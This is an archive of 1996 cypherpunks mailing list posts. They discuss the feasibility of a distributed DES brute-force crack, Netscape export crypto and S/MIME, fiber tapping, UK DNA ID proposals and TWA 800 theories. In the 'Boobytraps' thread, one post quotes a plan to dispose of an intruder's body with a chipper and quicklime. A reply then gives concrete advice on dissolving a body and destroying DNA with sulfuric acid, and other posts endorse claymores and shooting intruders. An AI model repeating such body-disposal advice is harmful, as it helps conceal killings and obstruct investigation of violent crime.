> > 
> > Perry
> > 
> > Paul Foley writes:
> > > "Peter Trei" <trei@process.com> wrote:
> > > 
> > >    Any one up for a distributed brute force attack on single DES? My 
> > >    back-of-the-envelope calculations and guesstimates put this on the
> > >    hairy edge of doability (the critical factor is how many machines can
> > >    be recruited - a non-trivial cash prize would help). 
> > > 
> > > Not quite sure what you mean by "doability" -- it's obviously doable,
> > > it just depends how long you want to wait.
> > > 
> > > I'm in.
> > 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@IO.COM>
Date: Tue, 23 Jul 1996 16:35:40 +0800
To: harka@nycmetro.com
Subject: Re: Bare fibers
In-Reply-To: <TCPSMTP.16.7.22.-16.21.10.2780269260.1201367@nycmetro.com>
Message-ID: <199607230530.AAA29271@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
>  * Carbons sent to: In: jimbell@pacifier.com
> 
>  -=> Quoting In:jimbell@pacifier.com to Harka <=-
> 
>  In> The fiber is usually  coated with a very thin layer of clear plastic to
>  In> protect against moisture  and abrasion, and the diameter  is around 0.5
>  In> to 1.0 millimeters in diameter.   
> 
> 
> Doesn't that make it vulnerable (detectable) to Tempest attacks?

Not really sure how.  I have had heard of ways to tap a fibre optic link
noninvasively, but its not related to Van Eck or anything like that.

> 
> Harka
> ___ Blue Wave/386 v2.30 [NR]
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Jul 1996 20:32:01 +0800
To: cypherpunks@toad.com
Subject: Re: Brute Force DES
Message-ID: <199607230741.AAA15203@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 7/22/96 -6, Peter Trei wrote:
>Single DES has the security of 56 bits of key - there are 64 bits in the
>keys, but 8 of them are parity bits which add nothing to security.
>2^56  = 7.205e16 keys (which is a whopping big number)
>Let's guess that we can recruit the equivalent of full-time on 1000
>machines.
>7.205e13 keys/machine.
>Let's guess that we have about a month before people start to lose 
>interest - so we want to be more than 1/2 done by then. Lets say
>we want to sweep the whole space in 40 days.
>
>1.8e12 keys/machine/day 
>
>~21,000,000 keys/machine/second
>
>The fastest general purpose, freely available des implementation I'm
>aware of is libdes. by Eric Young. With this, I can do a set_key in 
>15.8 us, and an ecb_encrypt in 95 us/block. That adds up to 
>about 9,000 keytests/sec (this is on a 90 MHz P5, running NT).

For grins, I decided to look at some old Intel data books; I had recalled 
that they build a DES encrypt/decrypt chip.  It was the 8294A, which could 
do 400,000 bytes per second, or 50,000 blocks per second.   That's fairly 
good for 1983 technology.   Since the clock rate of the typical 
microprocessor of the day was a 6-MHz 80286, and today's rate pushes 200 
MHz, I think it's fair to conclude that a similarly state-of-the-art DES 
chip should be similarly improved, about a factor of 30, or about 1.5 
million blocks per second.  That's somewhat less than 2000 system-years of 
operation.

(In practice, a cracker might be even more improved:  The 8294A used an 
8-bit I/O bus, which probably limited the rate at which encrypts could be 
done:  400,000 bytes per second means 400,000 writes, and 400,000 reads per 
second, or 1.25 microseconds per I/O byte throughput.  This is sufficiently 
close to state-of-the-art for 1983 that I speculate the internal encryption 
rate might be substantially faster.  And remember that a dedicated cracker 
doesn't need to I/O very much:  Comparing with a previously-stored template 
requires no I/O, unless the compare is good, and that will rarely happen.)

Not that I think that such a dedicated chip necessarily exists; chances are 
good that there isn't all that much demand for a 12-megabyte/second 
encryptor.  However, appropriately-fast DSP chips tend to be at the cutting 
edge for wide-word operations, so I'll guess that the best way to 
implement DES today (absent a dedicated chip)  would be on a DSP.   It would 
also be the cheapest, because DSP's are built in huge numbers for other 
applications.  

What this shows you is that there is a vast difference between doing a task 
on a fairly optized platform, and a general-purpose computer.  This _also_ 
shows you why the government is being highly dishonest by quoting the 
difficulty in cracking ciphers on scalar machines, rather than 
more-dedicated vector units.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 23 Jul 1996 19:52:14 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
Message-ID: <199607230808.BAA16026@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:13 PM 7/23/96 -0700, Timothy C. May wrote:

>No, a better solution it seems to me is to dispose of the body so there is
>only a "disappearance," with nothing to link the perp to one's self.
>(Unless the perp left records or told someone...)
>
>My place is pretty isolated, so I wonder if my proposed solution is enough:
>process with my 10 h.p Troy-Bilt chipper/shredder, treat output with 2
>sacks of quicklime, hose resulting product into ravine dropping down to
>valley floor below. (Probably too much DNA-carrying crud left around,


Contrary to all the old stories, quicklime (calcium hydroxide) actually 
PRESERVES bodies, it doesn't assist their decomposition. (It probably 
inhibits bacteria growth by raising pH, yet its alkalinity doesn't attack the organic 
material.)   What you want is a few gallons of concentrated sulfuric acid, 
which will hydrolyze the fats, the proteins, dissolve the calcium in the 
bones, as well as erase any traces of DNA left in the mixture.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 23 Jul 1996 20:04:16 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape
In-Reply-To: <v03007800ae18d6652564@[192.187.162.15]>
Message-ID: <31F48946.5E8E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri wrote:
> by creating a very large, glaring, and visceral
> public spectacle of the government cracking down on crypto, the
> resulting outcry could be absolutely enormous and resonate throughout
> the entire population. it would be a vivid portrayal of what the
> government has been doing quietly and secretly for decades, and
> perhaps the public might finally understand what is going on.

  I think that it would be more effective to get the US version
of netscape into the hands of as many US citizens as possible.
Taking away our permission to download in the near future after
a few tens of thousands of downloads won't mean near as much as telling
several million people running the US version that they can't
upgrade to the next release and maintain their strong crypto
capabilities.  Once a few million voters have it, it will be
very hard to take it away again.  What i'm hoping for is the
wide distribution of strong crypto in a user friendly package.
Isn't that the heart of cypherpunk ideals?

  I certainly have sympathy for those who want to make a point
by uploading our US software to hacktic and other foreign servers,
but I think that my company will probably have to ask hacktic
and others to remove these copies.

  I'm also curious why these anonymous crusaders did not act
sooner?  The US version has been available for sale in retail
outlets for about a year now.  Was it not worth $50 to make
your point?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 23 Jul 1996 20:09:51 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape
In-Reply-To: <v02120d1dae1a1186fd2e@[192.0.2.1]>
Message-ID: <31F48BF4.4F2E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> 
> At 13:38 7/22/96, Tom Weinstein wrote:
> 
> >Yes, and that's what we're trying to do.  Get strong crypto in the hands
> >of as many people as we can.  I can hardly wait until we get S/MIME in.
> 
> What will Netscape do to about the 40bit RC-2 default and the signatures on
> the outside of the encryption envelope design flaws in S/MIME? I can't
> imagine Netscape releasing software that has these two properties.

  If you know that the recipient can read a message encrypted with
3DES, IDEA, or RC2-128, then you can send the message using one of
these strong algorithms.  Given that you need someones public key
to send them a message, there are several obvious ways to transmit
information about what algorithms they accept along with it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 23 Jul 1996 20:09:23 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <31F48DAA.355@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven L Baur wrote:
> 
> >>>>> "Jeff" == Jeff Weinstein <jsw@netscape.com> writes:
> 
> Jeff>   Well yes, the first time they do it.  But the many times they
> Jeff> download new versions, from now until the end of time, they can
>                                             ^^^^^^^^^^^^^^^
> Jeff> use 128-bit SSL.
> 
> The world is ending September 17, 1996 I presume?  ;-)

  The final version of 3.0 will be available for download well
before Sept 17.  That version will not have a timebomb.  Even
the timebombed versions will let you connect to our site to
download new versions.

        --Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 24 Jul 1996 21:05:37 +0800
To: Vinnie Moscaritolo <cypherpunks@toad.com
Subject: re:SHI_fty
Message-ID: <2.2.32.19960723085749.00d81a34@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:13 PM 7/22/96 -0800, Vinnie Moscaritolo wrote:

>Uh I think apple had that for a while, it's called cyberdog
>http://cyberdog.apple.com screw this ole fud.

Unfortunatly, this is only available for Macs at this time.  Hopefully we
will see Windows and/or Unix versions sometime soon.  (Of course if you
expect Microsoft PR to resemble *ANYTHING* vaguely like reality...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 23 Jul 1996 20:14:09 +0800
To: cypherpunks@toad.com
Subject: Re: Boobytraps and the American Legal System
In-Reply-To: <ae198c8e1402100478ac@[205.199.118.202]>
Message-ID: <2sBiRD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


I think Tim May is growing senile...

tcmay@got.net (Timothy C. May) writes:
> (Later examples were to be even worse. For example, the burglar who climbed
> on a roof and stepped through a skylight. He sued, and won. I guess the
> owner of the property was obligated to install night lights so burglars
> could see their way, and to generally make his property more
> "burglar-friendly."

Actually, he fell through the roof of a school he was trying to burgalize.

In a similar incident a burglar broke into a house that was being treated
for pests (i.e., was full of toxic fumes). He died; his family sued the
owners and won.

Maybe someone can post a reference to these two cases. I recall that both
happened in New York, but I could be wrong.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 24 Jul 1996 05:58:16 +0800
To: harka@nycmetro.com
Subject: Re: Bare fibers
In-Reply-To: <TCPSMTP.16.7.22.-16.21.10.2780269260.1201367@nycmetro.com>
Message-ID: <Pine.BSF.3.91.960723031641.21785E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Doesn't that make it vulnerable (detectable) to Tempest attacks?
> 
> Harka
> ___ Blue Wave/386 v2.30 [NR]
> 

No.
Transmitting light via fiber doesn't emit EM.
Anyway, the original post, as I recall, was about keeping sensitive data 
on a second hard drive, connected via (very thin, therefore harder to 
notice) fiber. Tempest monitoring was not a factor.
-r.w.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <paul@mycroft.actrix.gen.nz>
Date: Tue, 23 Jul 1996 08:49:31 +0800
To: trei@process.com
Subject: Re: Borders *are* transparent
In-Reply-To: <199607221420.HAA00786@toad.com>
Message-ID: <199607221650.EAA01429@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


"Peter Trei" <trei@process.com> wrote:

   Any one up for a distributed brute force attack on single DES? My 
   back-of-the-envelope calculations and guesstimates put this on the
   hairy edge of doability (the critical factor is how many machines can
   be recruited - a non-trivial cash prize would help). 

Not quite sure what you mean by "doability" -- it's obviously doable,
it just depends how long you want to wait.

I'm in.

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
Disclaimer: "These opinions are my own, though for a small fee they be
yours too."
                -- Dave Haynie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 23 Jul 1996 17:27:43 +0800
To: Alex Derbes <acd@artemis.arc.nasa.gov>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.SGI.3.91.960722095424.5549D-100000@mother.arc.nasa.gov>
Message-ID: <Pine.LNX.3.94.960723053429.641B-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Alex Derbes wrote:

> Date: Mon, 22 Jul 1996 09:57:53 -0700 (PDT)
> From: Alex Derbes <acd@artemis.arc.nasa.gov>
> To: snow <snow@smoke.suba.com>
> Cc: Roger Williams <roger@coelacanth.com>, cypherpunks@toad.com
> Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
> 
> On Mon, 22 Jul 1996, snow wrote:
> 
> > On 22 Jul 1996, Roger Williams wrote:
> > > >>>>> "CCP" == snow  <snow@smoke.suba.com> writes:
> > >   >      Am I the only one in this country who, when hearing about TWA
> > >   > f800 shrugged his shoulders and thought (or said) "Time flies and
> > >   > aeroplanes crash" (Name the band and album and I'll be impressed)?
> > > Umm, isn't that "Time flies *but* aeroplanes crash"?
> > 
> >     Don't think so. I'll check in the morning. The wife doesn't like 
> > British HardCore at 3a.m. Silly girl. 
> > 
> > > Subhumans (the Brits).  12" EP of the same name.  Bluurg records.
> > 
> >      I have it on 29:29 Split Vision. Good stuff. 
> > 
> > > But, yes, my vague impression is that there is more press coverage
> > > (I get all my news from Auntie Beeb, who hasn't been as vociferous
> > > about it.)  But to most insular American types, terrorism is still a
> > > novelty.
> > > BTW, I wouldn't say that officials discounted terrorism -- you can bet
> > > Kallstrom is sure hoping that this isn't "just an accident"!
> > 
> >      Thing is, this crash was getting more attention than valuejet from the 
> > get go. Before there was any HINT of anything more that your typical 
> > gravity check plane crash it was all over the news.
> 
> Well,
> 
> 	There were no signs of mecahnical faliure, the plane took off one 
> hour late, that means if it was a timed bomb the plane would have gone 
> down over oh lets say random VERY VERY deep place in the atlantic ocean.  
> The plane was an easy shop for all sorts of shoulder launched SAM's.  
> There is a hell of alot of terrorist activity right now, and the 
> olympics, I think there is good circumstantial evidance to suggest 
> terrorist activty just from motives and oppertunity.
> 
> 
> my half a cent...
> 

Don't forget a reoccuring blip on the radar and 100+ witnesses that say
they saw a light go through the sky...

 --Deviant
We have art that we do not die of the truth.
		-- Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfRkrDAJap8fyDMVAQFEyAf+O7Ao5a+hE1UShvtaYAMVsYlqkEk11f28
MPo42U3miUzJH8PIgtQNbTC90NfAsCOL3fvAMaR3ihj0uaMbYG3v1sP16XoGnAh2
WMDZrQr0TgHqBOzq1JReVo6+Rz+Lna29Qpdm+yUEmJOk4g6KInxkNVUnhZiinK2l
u8+K+IEfaRGRcEyfMGYtuufy3BpMkBPGlJCTYZyLxvLXu179+OzB9y0iXSD02mdX
WTFxU/UQZ1fZ0dSOSbDmwxTUf+fHyQsqAN+/O5CiQ51dgk+xTe8U0ESvEO5AEbIB
NzvJ1BxnP7RNvDOVUrEily6YOlD16g2Hsz0m6rYGswzM6qYDPalGQA==
=dr2K
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 24 Jul 1996 22:48:29 +0800
To: Raph Levien <s_levien@research.att.com>
Subject: Re: Netscape
In-Reply-To: <v02120d1dae1a1186fd2e@[192.0.2.1]>
Message-ID: <31F4C7AB.18C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien wrote:
> 
> Jeff Weinstein wrote:
> >
> > Lucky Green wrote:
> > >
> > > At 13:38 7/22/96, Tom Weinstein wrote:
> > >
> > > >Yes, and that's what we're trying to do.  Get strong crypto in the hands
> > > >of as many people as we can.  I can hardly wait until we get S/MIME in.
> > >
> > > What will Netscape do to about the 40bit RC-2 default and the signatures on
> > > the outside of the encryption envelope design flaws in S/MIME? I can't
> > > imagine Netscape releasing software that has these two properties.
> >
> >   If you know that the recipient can read a message encrypted with
> > 3DES, IDEA, or RC2-128, then you can send the message using one of
> > these strong algorithms.  Given that you need someones public key
> > to send them a message, there are several obvious ways to transmit
> > information about what algorithms they accept along with it.
> 
>    Yes, we all know that. But which one will Netscape actually _do_?
> 
>    If there's one thing we've learned from PGP, it's that configuration
> and per-user key management are killers. The reason why I'm so excited
> about Netscape is that you guys have the _possibility_ to really get
> strong crypto to the masses. Whether you really do that or not is in
> your hands.
> 
>    I've made a proposal for solving the 40-bit protocol failure in
> S/MIME. There are other proposals out there too, with various strengths
> and weaknesses. The main advantage of mine is that it requires no
> additional infrastructure - i.e. VeriSign does not have to start
> including algorithm preferences in the DigitalID's they distribute.

  I don't like the fact that your proposal ties the size of the
bulk encryption key to the size of the public modulus.  There
are legitimate reasons why someone might choose to have a 512
bit modulus even though they prefer longer bulk encryption keys.
Your heuristic would be a good fallback in the absence of more
reliable information.  

  There is another method that does not require verisign or other
CAs to add key size extensions to their certs.  We can define
a new authenticated attribute that gets included in Signed-Data
and Signed-And-Enveloped-Data messages that indicates the
user's key size and algorithm preference.  This has the advantage
that the preference is selected and signed by the user.  This
method was discussed at the S/MIME meeting in January at the
RSA Crypto conference.  I'm a bit surprised that it never
got into the Implementation Guide.  I'll make sure that
we bring it up on the smime list again.

  What we finally implement will probably be a combination of
the three methods, with the user's selection taking precedence
over the CAs selection, which takes precedence over the
heuristic based on modulus size.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 24 Jul 1996 00:19:46 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download req
Message-ID: <TCPSMTP.16.7.23.5.59.16.2645935021.655066@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


-=> Quoting Int:dlv@bwalk.dm.com to pjn@nworks.com <=-

 In> of Archimedes Plutonium, Dr. Jozeph Goebbels, and Janet Reno combined.

    Ewwww... (Two is fine, but Reno pushed it over the edge :)


    P.J.
    pjn@nworks.com



... Hey Bill Clinton:  I'll give you something to censor....

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjn@nworks.com
Date: Wed, 24 Jul 1996 00:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-daw
Message-ID: <TCPSMTP.16.7.23.5.59.22.2645935021.655067@.nworks.com>
MIME-Version: 1.0
Content-Type: text/plain


 >> ichudov@algebra.com (Igor Chudov @ home) writes:
 
 >> David Sternlight wrote:
 >> <spam spam spam spam spam spam spam spam spam spam spam spam spam> >
 >> It is not surprising that after the society decided to label
 >> natural economic activities (drug dealing) as crimes, it has
 >> to resort to unnatural methods of enforcing the unnatural
 >> legislation.
 >> ...

 > Please do not respond to anything "Dr." David Sternlight posts to this
 > mailing list, no matter what nonsense he says. The asshole is starved
 > for attension. He's just trolling for flames. Please ignore him. Thank
 > you. 
 > -!-

  Get real... I dont like him or his posts, but he has the right to do 
  so, and you have no right to censor him or anyone else.  If you dont
  want to read his posts, then dont...Its that simple...

  For a mailing list that has so many people complaining about the
  government censoring people...


  P.J.
  pjn@nworks.com



... (A)bort  (R)etry  (S)mack the friggin' thing

___ Blue Wave/QWK v2.20 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 23 Jul 1996 17:44:17 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.93.960722114850.916E-100000@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960723062550.641C-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, snow wrote:

> Date: Mon, 22 Jul 1996 11:50:39 -0500 (CDT)
> From: snow <snow@smoke.suba.com>
> To: Alex Derbes <acd@artemis.arc.nasa.gov>
> Cc: Roger Williams <roger@coelacanth.com>, cypherpunks@toad.com
> Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
> 
> On Mon, 22 Jul 1996, Alex Derbes wrote:
> > 	There were no signs of mecahnical faliure, the plane took off one 
> > hour late, that means if it was a timed bomb the plane would have gone 
> > down over oh lets say random VERY VERY deep place in the atlantic ocean.  
> > The plane was an easy shop for all sorts of shoulder launched SAM's.  
> 
>      According to the information I have seen, there are no SAM's that can
> reach out and touch a plane at 13000 feet. The engagement ceiling on a
> most is 8000 to 9000 feet iirc.
> 

Ummm... Stinger missles go ~5 miles.  13000 is about 2.7 miles.  

> > There is a hell of alot of terrorist activity right now, and the 
> > olympics, I think there is good circumstantial evidance to suggest 
> > terrorist activty just from motives and oppertunity.
> 
>      What motives?
> 

There was a threat the day beforehand and all...

 --Deviant
We have art that we do not die of the truth.
		-- Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfRwtzAJap8fyDMVAQHZSwf+MCsESHno8VTvqwTTULh7yhwyiRbaoxcp
hi/lVaAcX472fbt+128tpcCmm4rz9wTWhl/0/PJKjno9y20r7mcXMgJrQNsQ3c7K
W2p3UPXpOBuZvtEVrSl3nC9rM7pYnuKYXPgWOnOn4zRf33GBBtoJGezBNg2i0pVH
HSp/+L0VC1/cmw9IbGIkv3y+TDwyTdzj727zEmArC3DkBlcG1ZL33FciY9XYhMH0
BuhiHo/uC6S/qAIGVoh/xcf9QLpV+z2Q3FfVxl1mlAmgWPup7rxqbD614NjjWJ6I
lnGoJUyIiTQCKXdlBewApepq7HylpI3OGJ8ThrV4Mj7Wzjvt8vr1ZQ==
=4nla
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Tue, 23 Jul 1996 18:35:51 +0800
To: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v03007602ae19799867d7@[204.179.128.64]>
Message-ID: <Pine.LNX.3.94.960723063951.641D-100000@switch.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 22 Jul 1996, Vinnie Moscaritolo wrote:

> Date: Mon, 22 Jul 1996 10:36:14 -0800
> From: Vinnie Moscaritolo <vinnie@webstuff.apple.com>
> To: cypherpunks@toad.com
> Cc: snow@smoke.suba.com
> Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
> 
> >   You pop a claymore in a building with any substance up to the level of
> >concrete re-enforced, and you _will_ be going with them.
> 
> booby traping your home is a really stupid idea, I promise that your
> dog/child/spouse will be theone to accidentally set it off. besides for
> this you can get sued..
> 
> every hear the one about the case of a guy who constantly had his radar
> detector stolen out his his car, he decides to set a trap and rigs his next
> one with exposive. The perp steals the box, sells it. someclown powers it
> up on his dash board and BANG!.. well you'd figure justice is served, but
> the NYC judges awarded the mass of flesh damages and charged the guy with
> manslaughter.
> 
> only in Amerika..
> 

Hrmmm... for the "pre-dawn raid" thing though, I've got a better one.

Where I live (Wake County, North Carolina), if someone's breaking into
your home, until they identify themselves as law inforcement, its legal to
shoot, and even kill, them, _As long as they're facing you_... funny, eh?

So, if someone breaks through my window at 6:00 AM, and they don't say
"Police" or "Secret Services", they aren't gonna be saying anything.

 --Deviant
We have art that we do not die of the truth.
		-- Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfR0YjAJap8fyDMVAQH8TQf8CsdZB48EQTsqBF9ZnMGLrYWEYKIg8HYu
YGYtcNs5SxVfUqu5GAWyO6UO+uJgOV+f5149/UeCYa8l5NAcU+JRCoH/37ZoNLDv
c+Tg1W0Wli/paqXU0CdE7grTzXMJ1z+QSZiZPufUycPA+diqUQhvHeIKq9lwxR5c
eppagNCVKVTkKCRRacZRkkDlF0G3KUhoFk65wYo/cJpAIpulUtPiclqR7jYXyOqc
28Zw9lMHMZ6CQFVaM7eTcRf61wf2I8vCIw28hRqABO+fjF6luRyuc0YFtwjDw1t0
pZHe5nIy8tsuxQ8n2mNf5OGHKWErwKcvEvW8kowsB+Jgw3wvi7uu7A==
=GLmi
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Wed, 24 Jul 1996 02:23:19 +0800
To: cypherpunks@toad.com
Subject: RE: Distributed DES crack
Message-ID: <199607231413.HAA14171@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to see a very general hardware processing power equivalence table.
For example, 1 MasPar equals how many Pentiums.  This would be extremely
useful in figuring out a range of the types of boxes required to do this.

Joel

At 09:51 AM 7/23/96 +0100, Andy Brown wrote:

>But first, a little reality check is in order.  According to libdes,
>the 200Mhz Pentium Pro on my desk will do 1,827,997 ECB bytes/sec, or
>228,499 ECB blocks.  A DES crack would have to try, on average, 2^55
>blocks.  That would take my machine 43,798,875 hours, or 1,824,953 days.
>
>OK, so let's be reasonable and say that a week would be a good time to
>come up with a DES key.  We would need 260,707 200Mhz Pentium Pro's to
>achieve this.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William \"Bud\" Kennedy" <bkennedy@nb.net>
Date: Wed, 24 Jul 1996 00:48:11 +0800
To: cypherpunks@toad.com
Subject: DNA printing at birth
Message-ID: <Pine.3.89.9607230706.A22060-0100000@platinum.nb.net>
MIME-Version: 1.0
Content-Type: text/plain



   [IMAGE] UK News Electronic Telegraph Monday July 22 1996
   [IMAGE] Issue 432
   
   See text menu at bottom of page [IMAGE] Labour plans DNA tests for
   everyone from birth
   By Rachel Sylvester, Political Staff
   
   
   
   
     _________________________________________________________________
   
   External Links
   
   
   
   [IMAGE]
          Identity cards - A solution looking for a problem
          
          
   [IMAGE]
          Conservative Way Forward - Danger of compulsory ID cards
          
          
   [IMAGE]
          Centre for Computing and Social Responsibility - response to
          Green Paper on ID cards
          
          
   
     _________________________________________________________________
   
   
   
   
   
   RADICAL plans to take the genetic fingerprints of everyone in Britain
   and put them on a compulsory ID card are being considered by Labour.
   
   A database of DNA identities would be used to solve crimes and cut
   benefit fraud. Frank Field, tipped as a possible Social Security
   Secretary in a Labour government, has drafted proposals to produce a
   genetic database of the nation. Blood samples would taken from babies
   and from people applying to live in Britain.
   
   The samples would be used to extract DNA. Only identical twins have
   the same DNA, making it a more accurate fingerprint. Chris Smith,
   shadow social security secretary, confirmed that the party was
   examining the plans. "We are not ruling them out. We are determined to
   cleanse the national insurance system of fraud."
   
   John Wadham, director of the pressure group Liberty, said it was
   incredible that a senior Labour politician could suggest such a
   "draconian" measure which breaches European law. "There is no evidence
   that such a massive invasion of our privacy would do anything very
   much towards stopping crime."
   
   Mr Field, chairman of the Commons Social Security Select Committee,
   also advocates taking compulsory fingerprints from every citizen as a
   fall back to confirming a person's identity. The combination of
   genetic and physical fingerprints would be used to "rebuild the
   national insurance system", Mr Field said yesterday.
   
   Each person would be given a number at birth, combining national
   insurance and health numbers, which would tally with their genetic
   code. The information would go on a computerised identity card. It
   would also contain an individual's address, medical history or
   criminal record. It would be impossible to claim benefit without the
   card. Mr Field believes that Mr Blair is "sympathetic" to the
   proposals and that any opponents would be "Old Labour". Mr Blair will
   express his determination to reduce fraud in a speech tomorrow.
   
   Mr Field, MP for Birkenhead and described as one of Blair's "gurus",
   believes that the scheme would eradicate the use of multiple
   identities by benefit fraudsters and wipe off a large part of the
   annual £2.5 billion cost of social security fraud. There are millions
   of bogus national insurance numbers in circulation. It would also
   allow police to solve more crimes because traces of semen, hair or
   skin found at a burglary or rape would lead to the culprit.
   
   Ann Widdecombe, the Home Office Minister, said: "There are huge
   practical and resource implications. Think what it would cost to test
   every person in the country." Mr Wadham said there was no guarantee
   that the benefits would follow. "Not all fraud is to do with bogus
   national insurance numbers. I do not understand why, even if you have
   an identity card, you would need a genetic database."
   
   Mr Field advocates setting up a commission to regulate the use of the
   information. It is unlikely that any policy would be announced before
   the general election. Mr Blair, who is known to be looking for radical
   ideas on social security, has told shadow ministers to "think the
   unthinkable" and remind the public that "with rights come
   responsibilities".





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Wed, 24 Jul 1996 00:35:22 +0800
To: jsw@netscape.com
Subject: Re: Netscape
In-Reply-To: <v02120d1dae1a1186fd2e@[192.0.2.1]>
Message-ID: <31F4C095.2886@research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> 
> Lucky Green wrote:
> >
> > At 13:38 7/22/96, Tom Weinstein wrote:
> >
> > >Yes, and that's what we're trying to do.  Get strong crypto in the hands
> > >of as many people as we can.  I can hardly wait until we get S/MIME in.
> >
